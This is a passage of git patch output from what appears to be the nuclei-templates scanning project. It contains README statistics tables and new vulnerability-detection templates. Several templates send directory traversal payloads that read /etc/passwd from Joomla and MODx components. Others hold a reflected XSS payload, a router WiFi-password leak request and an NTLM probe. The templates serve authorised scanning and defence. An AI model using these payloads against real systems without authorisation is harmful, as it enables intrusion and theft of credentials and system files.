| | | | +| weiphp | 1 | | | | | | | | | | lutron | 1 | | | | | | | | | | concrete | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| linux | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | | chinaunicom | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | | twitter-server | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| prestashop | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | | kafdrop | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index f3ea916ac5..18bef8f400 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 576 | dhiyaneshdk | 234 | cves | 583 | info | 577 | http | 1696 | -| panel | 214 | pikpikcu | 234 | vulnerabilities | 262 | high | 457 | file | 46 | -| xss | 213 | pdteam | 191 | exposed-panels | 216 | medium | 385 | network | 35 | -| wordpress | 198 | daffainfo | 128 | exposures | 174 | critical | 218 | dns | 11 | -| exposure | 196 | geeknik | 127 | technologies | 158 | low | 156 | | | -| rce | 183 | dwisiswant0 | 127 | misconfiguration | 124 | | | | | -| lfi | 168 | gy741 | 62 | takeovers | 70 | | | | | -| cve2020 | 155 | madrobot | 60 | default-logins | 50 | | | | | -| wp-plugin | 133 | princechaddha | 53 | file | 46 | | | | | -| tech | 100 | gaurang | 42 | workflows | 34 | | | | | +| cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 | +| panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 | +| xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 | +| wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 | +| exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | | +| rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | | +| lfi | 176 | gy741 | 68 | takeovers | 70 | | | | | +| cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | | +| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | +| tech | 101 | gaurang | 42 | workflows | 35 | | | | | From 6c5aee5789f80e2cec78b8ca9ff80ac12a75c9ba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 12 Aug 2021 19:27:30 +0000 Subject: [PATCH 1608/4083] Auto Update README [Thu Aug 12 19:27:30 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 6995b4f020..05efb37d28 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 576 | dhiyaneshdk | 234 | cves | 583 | info | 577 | http | 1696 | -| panel | 214 | pikpikcu | 234 | vulnerabilities | 262 | high | 457 | file | 46 | -| xss | 213 | pdteam | 191 | exposed-panels | 216 | medium | 385 | network | 35 | -| wordpress | 198 | daffainfo | 128 | exposures | 174 | critical | 218 | dns | 11 | -| exposure | 196 | geeknik | 127 | technologies | 158 | low | 156 | | | -| rce | 183 | dwisiswant0 | 127 | misconfiguration | 124 | | | | | -| lfi | 168 | gy741 | 62 | takeovers | 70 | | | | | -| cve2020 | 155 | madrobot | 60 | default-logins | 50 | | | | | -| wp-plugin | 133 | princechaddha | 53 | file | 46 | | | | | -| tech | 100 | gaurang | 42 | workflows | 34 | | | | | +| cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 | +| panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 | +| xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 | +| wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 | +| exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | | +| rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | | +| lfi | 176 | gy741 | 68 | takeovers | 70 | | | | | +| cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | | +| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | +| tech | 101 | gaurang | 42 | workflows | 35 | | | | | -**143 directories, 1845 files**. +**144 directories, 1870 files**. From 273204509495ea8b7891969981f82b31ba97ef28 Mon Sep 17 00:00:00 2001 From: r3dg33k <2913793+r3dg33k@users.noreply.github.com> Date: Thu, 12 Aug 2021 23:09:18 +0300 Subject: [PATCH 1609/4083] Update bazarr-login.yaml without system/status dont work. removed extractor, just added detection --- exposed-panels/bazarr-login.yaml | 29 ++++++----------------------- 1 file changed, 6 insertions(+), 23 deletions(-) diff --git a/exposed-panels/bazarr-login.yaml b/exposed-panels/bazarr-login.yaml index c88bdb6d51..9ef197aa06 100644 --- a/exposed-panels/bazarr-login.yaml +++ b/exposed-panels/bazarr-login.yaml @@ -10,15 +10,13 @@ info: requests: - raw: - | - GET /api/system/status HTTP/1.1 + GET /system/status HTTP/1.1 Host: {{BaseURL}} Connection: keep-alive - Accept: application/json, text/plain, */* - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 - Sec-GPC: 1 - Referer: {{BaseURL}}/system/status - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 + Cache-Control: max-age=0 + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im - | GET /login HTTP/1.1 @@ -32,24 +30,9 @@ requests: Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 - matchers-condition: or + matchers-condition: and matchers: - - type: word - words: - - '"bazarr_config_directory"' - - '"bazarr_directory"' - - '"bazarr_version"' - condition: and - - type: word words: - 'Bazarr' - 'Bazarr is a companion application to Sonarr and Radarr' - condition: and - - extractors: - - type: regex - part: body - regex: - - '"bazarr_version":\s"\d\.[0-9]+\.[0-9]+"' - - '"operating_system":\s"[^"]*"' From 5d5adbfea89e7c9424584a835e0aee28dac4b8b4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 13 Aug 2021 06:20:38 +0700 Subject: [PATCH 1610/4083] Create CVE-2008-4668.yaml --- cves/2008/CVE-2008-4668.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2008/CVE-2008-4668.yaml diff --git a/cves/2008/CVE-2008-4668.yaml b/cves/2008/CVE-2008-4668.yaml new file mode 100644 index 0000000000..86cdf1bca8 --- /dev/null +++ b/cves/2008/CVE-2008-4668.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-4668 + +info: + name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/6618 + - https://www.cvedetails.com/cve/CVE-2008-4668 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From b6ff5d4f145a2572e105c8c713faa72ec822c76d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 13 Aug 2021 06:23:04 +0700 Subject: [PATCH 1611/4083] Create CVE-2010-1955.yaml --- cves/2010/CVE-2010-1955.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1955.yaml diff --git a/cves/2010/CVE-2010-1955.yaml b/cves/2010/CVE-2010-1955.yaml new file mode 100644 index 0000000000..569e73c820 --- /dev/null +++ b/cves/2010/CVE-2010-1955.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1955 + +info: + name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12238 + - https://www.cvedetails.com/cve/CVE-2010-1955 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 5b81af7ab4c24dcc0fcf7299565f9044f2fc5185 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Fri, 13 Aug 2021 13:34:28 +0900 Subject: [PATCH 1612/4083] Create netis-info-leak.yaml Signed-off-by: GwanYeong Kim --- vulnerabilities/other/netis-info-leak.yaml | 28 ++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/netis-info-leak.yaml diff --git a/vulnerabilities/other/netis-info-leak.yaml b/vulnerabilities/other/netis-info-leak.yaml new file mode 100644 index 0000000000..9e3cd22bc1 --- /dev/null +++ b/vulnerabilities/other/netis-info-leak.yaml @@ -0,0 +1,28 @@ +id: netis-info-leak + +info: + name: Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak + author: gy741 + severity: low + reference: https://www.exploit-db.com/exploits/48384 + tags: netis,exposure + +requests: + - raw: + - | + GET //netcore_get.cgi HTTP/1.1 + Host: {{Hostname}} + Cookie: homeFirstShow=yes + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rp_ap_password" + - "rp_ap_ssid" + part: body + condition: and From 035ee067400f6514e5e53535144306136203d71e Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Fri, 13 Aug 2021 16:22:36 +0530 Subject: [PATCH 1613/4083] Update CVE-2021-35464.yaml --- cves/2021/CVE-2021-35464.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index 5b884fab3a..7edc1b0451 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -31,4 +31,6 @@ requests: - type: word words: - "Version Information -" - part: body \ No newline at end of file + - "openam/ccversion/Masthead.jsp" + part: body + condition: or From 126e27e3b2592019ca65108a711ec189336dc0ad Mon Sep 17 00:00:00 2001 From: LogicalHunter Date: Fri, 13 Aug 2021 10:49:41 -0700 Subject: [PATCH 1614/4083] Added crossdomain-xml Template --- exposures/files/crossdomin-xml.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/files/crossdomin-xml.yaml diff --git a/exposures/files/crossdomin-xml.yaml b/exposures/files/crossdomin-xml.yaml new file mode 100644 index 0000000000..6838451826 --- /dev/null +++ b/exposures/files/crossdomin-xml.yaml @@ -0,0 +1,25 @@ +id: insecure-crossdomain + +info: + name: Insecure cross-domain.xml file + author: Borna Nematzadeh + severity: medium + reference: https://www.acunetix.com/vulnerabilities/web/insecure-crossdomain-xml-file + tags: exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/crossdomain.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '' + + From e6d9a1ec90149f9c48a2e1a31a40b73a848c6cb0 Mon Sep 17 00:00:00 2001 From: LogicalHunter Date: Fri, 13 Aug 2021 11:25:10 -0700 Subject: [PATCH 1615/4083] Fixed crossdomain-xml template --- exposures/files/crossdomin-xml.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/crossdomin-xml.yaml b/exposures/files/crossdomin-xml.yaml index 6838451826..208ca143b1 100644 --- a/exposures/files/crossdomin-xml.yaml +++ b/exposures/files/crossdomin-xml.yaml @@ -3,7 +3,7 @@ id: insecure-crossdomain info: name: Insecure cross-domain.xml file author: Borna Nematzadeh - severity: medium + severity: info reference: https://www.acunetix.com/vulnerabilities/web/insecure-crossdomain-xml-file tags: exposure From 1ea3dfe3b7309b80f279fab41a1b9f21cf9970b3 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 13 Aug 2021 17:14:13 -0500 Subject: [PATCH 1616/4083] Create CVE-2021-37573.yaml --- cves/2021/CVE-2021-37573.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2021/CVE-2021-37573.yaml diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml new file mode 100644 index 0000000000..5474803cf9 --- /dev/null +++ b/cves/2021/CVE-2021-37573.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-37573 + +info: + name: Tiny Java Web Server Reflected XSS + reference: + - https://seclists.org/fulldisclosure/2021/Aug/13 + author: geeknik + severity: medium + tags: cve,cve2021,xss,tjws + +requests: + - method: GET + path: + - "{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est" + + matchers-condition: and + matchers: + - type: status + status: + - 404 + - type: word + part: body + words: + - "

    404 test not found

    " From eed8e2e57330d35dce5b5cb25232ba1345d82bea Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 13 Aug 2021 17:17:18 -0500 Subject: [PATCH 1617/4083] Update CVE-2021-37573.yaml --- cves/2021/CVE-2021-37573.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml index 5474803cf9..6941c6cd68 100644 --- a/cves/2021/CVE-2021-37573.yaml +++ b/cves/2021/CVE-2021-37573.yaml @@ -1,6 +1,6 @@ id: CVE-2021-37573 -info: +info: name: Tiny Java Web Server Reflected XSS reference: - https://seclists.org/fulldisclosure/2021/Aug/13 From 344fba3089f73121b44ab8c1023d6ed3a2f3897c Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 13 Aug 2021 17:17:35 -0500 Subject: [PATCH 1618/4083] Update CVE-2021-37573.yaml --- cves/2021/CVE-2021-37573.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml index 6941c6cd68..4419e9d6d0 100644 --- a/cves/2021/CVE-2021-37573.yaml +++ b/cves/2021/CVE-2021-37573.yaml @@ -18,7 +18,7 @@ requests: - type: status status: - 404 - - type: word + - type: word part: body words: - "

    404 test not found

    " From 966648d4f74379040ba560a1dab6b350d8062fe4 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 14 Aug 2021 05:12:43 +0530 Subject: [PATCH 1619/4083] ntlm-directories path/payload update --- miscellaneous/ntlm-directories.yaml | 122 ++++++++++++++++------------ 1 file changed, 68 insertions(+), 54 deletions(-) diff --git a/miscellaneous/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml index 839d67428e..cfd9fc28aa 100644 --- a/miscellaneous/ntlm-directories.yaml +++ b/miscellaneous/ntlm-directories.yaml @@ -2,67 +2,81 @@ id: ntlm-directories info: name: Discovering directories w/ NTLM - author: puzzlepeaches + author: puzzlepeaches,incogbyte severity: info - tags: misc + tags: misc,fuzz,windows + reference: https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666 requests: - - method: GET - path: - - "{{BaseURL}}/abs/" - - "{{BaseURL}}/adfs/services/trust/2005/windowstransport" - - "{{BaseURL}}/aspnet_client/" - - "{{BaseURL}}/autodiscover/" - - "{{BaseURL}}/autoupdate/" - - "{{BaseURL}}/certenroll/" - - "{{BaseURL}}/certprov/" - - "{{BaseURL}}/certsrv/" - - "{{BaseURL}}/conf/" - - "{{BaseURL}}/deviceupdatefiles_ext/" - - "{{BaseURL}}/deviceupdatefiles_int/" - - "{{BaseURL}}/dialin/" - - "{{BaseURL}}/ecp/" - - "{{BaseURL}}/etc/" - - "{{BaseURL}}/ews/" - - "{{BaseURL}}/exchange/" - - "{{BaseURL}}/exchweb/" - - "{{BaseURL}}/groupexpansion/" - - "{{BaseURL}}/hybridconfig/" - - "{{BaseURL}}/mcx/" - - "{{BaseURL}}/mcx/mcxservice.svc" - - "{{BaseURL}}/meet/" - - "{{BaseURL}}/meeting/" - - "{{BaseURL}}/microsoft-server-activesync/" - - "{{BaseURL}}/oab/" - - "{{BaseURL}}/ocsp/" - - "{{BaseURL}}/owa/" - - "{{BaseURL}}/persistentchat/" - - "{{BaseURL}}/phoneconferencing/" - - "{{BaseURL}}/powershell/" - - "{{BaseURL}}/public/" - - "{{BaseURL}}/reach/sip.svc" - - "{{BaseURL}}/requesthandler/" - - "{{BaseURL}}/requesthandlerext/" - - "{{BaseURL}}/rgs/" - - "{{BaseURL}}/rgsclients/" - - "{{BaseURL}}/rpc/" - - "{{BaseURL}}/rpcwithcert/" - - "{{BaseURL}}/scheduler/" - - "{{BaseURL}}/ucwa/" - - "{{BaseURL}}/unifiedmessaging/" - - "{{BaseURL}}/webticket/" - - "{{BaseURL}}/webticket/webticketservice.svc" - - "{{BaseURL}}/webticket/webticketservice.svcabs/" + - payloads: + path: + - / + - /abs/ + - /ecp/ + - /etc/ + - /ews/ + - /mcx/ + - /oab/ + - /owa/ + - /rgs/ + - /rpc/ + - /conf/ + - /meet/ + - /ocsp/ + - /ucwa/ + - /adfs/ + - /dialin/ + - /public/ + - /certsrv/ + - /exchweb/ + - /meeting/ + - /certprov/ + - /exchange/ + - /scheduler/ + - /webticket/ + - /autoupdate/ + - /certenroll/ + - /powershell/ + - /rgsclients/ + - /rpcwithcert/ + - /autodiscover/ + - /hybridconfig/ + - /reach/sip.svc + - /aspnet_client/ + - /groupexpansion/ + - /persistentchat/ + - /requesthandler/ + - /unifiedmessaging/ + - /mcx/mcxservice.svc + - /phoneconferencing/ + - /requesthandlerext/ + - /deviceupdatefiles_ext/ + - /deviceupdatefiles_int/ + - /microsoft-server-activesync/ + - /webticket/webticketservice.svc + - /webticket/webticketservice.svcabs/ + - /adfs/services/trust/2005/windowstransport + + attack: sniper + threads: 50 + + raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= matchers-condition: and matchers: - - type: word - words: - - "WWW-Authenticate: NTLM" - - "Www-Authenticate: NTLM" - part: header - condition: or + - type: dsl + dsl: + - "contains(tolower(all_headers), 'www-authenticate: ntlm')" - type: status status: - 401 + + extractors: + - type: kval + kval: + - 'www_authenticate' From 1a2d30d2070dbefe0fccb7fc2287241e1df8bdd3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 14 Aug 2021 08:36:29 +0700 Subject: [PATCH 1620/4083] Create CVE-2010-5278.yaml --- cves/2010/CVE-2010-5278.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-5278.yaml diff --git a/cves/2010/CVE-2010-5278.yaml b/cves/2010/CVE-2010-5278.yaml new file mode 100644 index 0000000000..b52d78690f --- /dev/null +++ b/cves/2010/CVE-2010-5278.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-5278 + +info: + name: MODx manager - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter. + reference: | + - https://www.exploit-db.com/exploits/34788 + - https://www.cvedetails.com/cve/CVE-2010-5278 + tags: cve,cve2010,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 439b20cb42c5cd3e7e94162fca4fe5089007b427 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 14 Aug 2021 08:37:46 +0700 Subject: [PATCH 1621/4083] Create CVE-2010-1353.yaml --- cves/2010/CVE-2010-1353.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1353.yaml diff --git a/cves/2010/CVE-2010-1353.yaml b/cves/2010/CVE-2010-1353.yaml new file mode 100644 index 0000000000..c26e19fdb3 --- /dev/null +++ b/cves/2010/CVE-2010-1353.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1353 + +info: + name: Joomla! Component LoginBox - Local File Inclusion + author: daffainfo 